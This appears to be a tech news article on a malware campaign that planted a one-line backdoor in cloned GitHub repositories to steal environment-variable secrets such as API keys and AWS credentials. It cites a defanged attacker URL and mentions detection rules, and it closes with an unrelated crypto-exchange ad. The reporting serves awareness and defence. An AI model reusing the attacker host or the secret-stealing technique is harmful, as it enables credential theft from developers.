Malware Spread Through Cloned GitHub Repositories: What Developers Need to Know

By Riley ThompsonTechnology News

Malware Spreading Through Cloned GitHub Repositories

Developer Stephen Lacy caused a stir in the tech community when he announced on Twitter that he had discovered a “large-scale malware attack” on GitHub, affecting around 35,000 repositories. However, it turned out that there was no actual compromise or hack: the repositories in question were forks (copies) of other projects, intentionally created to spread malware.

Lacy’s original tweet alarmed many, as he claimed that 35,000 repositories were infected with malware, impacting well-known projects such as crypto, golang, python, js, bash, docker, and k8s. Unfortunately, many people didn’t read beyond the initial message, but Lacy later clarified the situation in a follow-up thread.

How the Attack Worked

While forking repositories is a common and encouraged practice among developers, in this case, attackers created copies of legitimate projects and injected them with malicious code. Their goal was to target unsuspecting developers who might use these infected clones.

The issue came to light when Lacy was reviewing an open-source project he found via Google and noticed the following URL in the code: hxxp://ovz1.j19544519.pr46m.vps.myjino[.]ru. A search on GitHub revealed that this URL appeared in over 35,000 files across various repositories.

Clarifying the Numbers

According to journalists at Bleeping Computer, the 35,000 figure refers to the number of suspicious files, not infected repositories. For example, out of 35,788 search results, more than 13,000 came from a single repository—redhat-operator-ecosystem. So, Lacy’s initial estimate was somewhat inaccurate.

What the Malicious Code Did

After Lacy’s report, many experts began investigating. James Tucker, for instance, found that the cloned repositories containing the malicious URL were extracting users’ environment variables and included a one-line backdoor. This allowed hackers to steal sensitive secrets, including API keys, tokens, Amazon AWS credentials, and cryptographic keys, as well as execute arbitrary code on infected systems.

Timeline and Response

Bleeping Computer noted that most of the cloned repositories appeared within the last month (between six and twenty days prior), but some repositories with malicious commits dated back as far as 2015, suggesting they may have been hacked.

More recent commits containing the malicious URL are mostly from security researchers, including threat analyst Florian Roth, who created Sigma rules to detect the malicious code. Unfortunately, some GitHub users misunderstood the situation and mistakenly reported the Sigma repository as malicious.

According to Lacy and journalists, GitHub has removed nearly all of the malicious cloned repositories from its platform in the past few hours.

Source

Onion Market — a free P2P exchange on Telegram. They offer XMR, BTC, and USDT.TRC20.

Leave a Reply